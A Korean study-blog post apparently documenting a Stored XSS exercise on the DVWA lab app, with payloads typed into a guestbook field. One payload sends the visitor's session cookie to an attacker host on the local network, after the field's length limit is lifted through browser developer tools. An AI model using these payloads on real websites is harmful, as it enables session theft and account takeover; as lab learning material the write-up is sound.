yehey's 공부 노트 \n ο(=•ω<=)ρ⌒☆

Stored XSS 공격 실습 본문

웹/웹 해킹

Stored XSS 공격 실습

yehey 2020. 10. 8. 00:37
실습환경: DVWA-XSS(Stored), kali 리눅스

 

Stored XSS 실습에는 방명록이 있다.

이름과 메시지를 남길 수 있는 입력란이 있다.

 

Reflected XSS와 마찬가지로 팝업창에 쿠키를 띄우도록 해보자

메시지를 남길 수 있는 칸에 다음과 같은 자바스크립트를 입력해보자

<script>alert(document.cookie)</script>

reflected XSS 처럼 팝업창에 쿠키가 나타난다.

하지만 stored XSS에서는 다른 페이지에 갔다가 돌아와도 팝업은 계속해서 띄워진다.

 

세션 쿠키를 공격자 호스트로 전달하기

Reflected XSS 실습처럼 칼리 리눅스 apache2 서버를 열어 access.log를 모니터링 하는 방식을 사용한다.

(tail 명령어 사용)

apache2 서버 여는 법은 reflected XSS 에 자세히 나옴 - 2020/10/04 - [웹/웹 해킹] - Reflected XSS 공격 실습

 

<script>document.location='http://192.168.56.104/cookie?'+document.cookie</script>

위와 같은 자바스크립트 코드를 메시지 입력란에 넣어주려고 했는데

입력 글자수 제한이 걸려있어서 입력할 수 없다.

 

그래서 F12에서 해당 입력란의 최대 길이를 임시로 바꾸어줄 것이다.

maxlength가 50으로 설정되어 있는데 이를 잠시 100으로 바꾸어주고 자바스크립트를 다시 입력해서 제출해보자

 

제출 전의 접근 로그는 다음과 같다.

 

자바스크립트 입력 전의 접근 로그

방명록을 제출한 후에는 다음과 같은 페이지가 출력된다. (reflected XSS에서 본 것과 같은 페이지)

 

그리고 access.log 를 확인해보니 다음과 같이 세션 쿠키가 전달된 것을 확인할 수 있다.

 

' > 웹 해킹' 카테고리의 다른 글

파일 업로드 공격 및 실습  (0) 2020.11.12
파일 인클루전 (File inclusion)  (0) 2020.11.11
Reflected XSS 공격 실습  (0) 2020.10.04
Command injection 공격 실습  (0) 2020.10.01
SQL injection 실습3 (Blind)  (0) 2020.09.30
Comments